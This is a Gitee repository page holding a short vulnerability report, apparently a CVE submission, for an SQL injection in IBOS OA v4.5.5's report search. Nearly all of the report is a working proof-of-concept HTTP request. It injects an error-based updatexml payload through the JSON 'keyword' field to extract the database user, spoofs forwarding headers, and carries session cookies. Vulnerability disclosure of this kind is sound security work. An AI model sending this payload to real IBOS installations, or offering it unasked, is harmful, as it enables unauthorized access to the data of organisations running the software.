1 Star 0 Fork 0

wkstestete / cve

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
ibos sql injection3.md 1.67 KB
一键复制 编辑 Web IDE 原始数据 按行查看 历史
wkstestete 提交于 2023-03-28 04:47 . update sql/ibos sql injection3.md.

ibos oa v4.5.5 sql Injection vulnerability

download link:https://gitee.com/ibos/IBOS

Function point: Report => Search box

输入图片说明

输入图片说明

POC

POST /?r=report/api/getlist HTTP/1.1
Host: www.ibos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://www.ibos.com
Connection: close
Referer: http://www.ibos.com/?r=report/default/index
Cookie: 4tVy_saltkey=JPW119wg; PHPSESSID=0pbgbc7oflgcqf792p92nqo7u0; 4tVy_sid=0r6tzo; lastautologin=0; 4tVy_lastactivity=1679978644; 4tVy_ulastactivity=d9bdiYlHnIPm8Tx0Dnc%2BPNmlkEXAIfB%2BmyV9r5ENIIsFGRSnQdPC; 4tVy_creditremind=0D0D2D0D0D0D1; 4tVy_creditbase=0D4D47D5D0D0; 4tVy_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4tVy_dropnotify=%7B%22assignment%22%3A%221%22%2C%22email%22%3A%221%22%2C%22officialdoc%22%3A%223%22%2C%22user%22%3A%222%22%2C%22vote%22%3A%222%22%2C%22unread_notify%22%3A9%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A1%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A10%7D
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}

Error to get the database name

输入图片说明

1
https://gitee.com/wkstestete/cve.git
git@gitee.com:wkstestete/cve.git
wkstestete
cve
cve
master

搜索帮助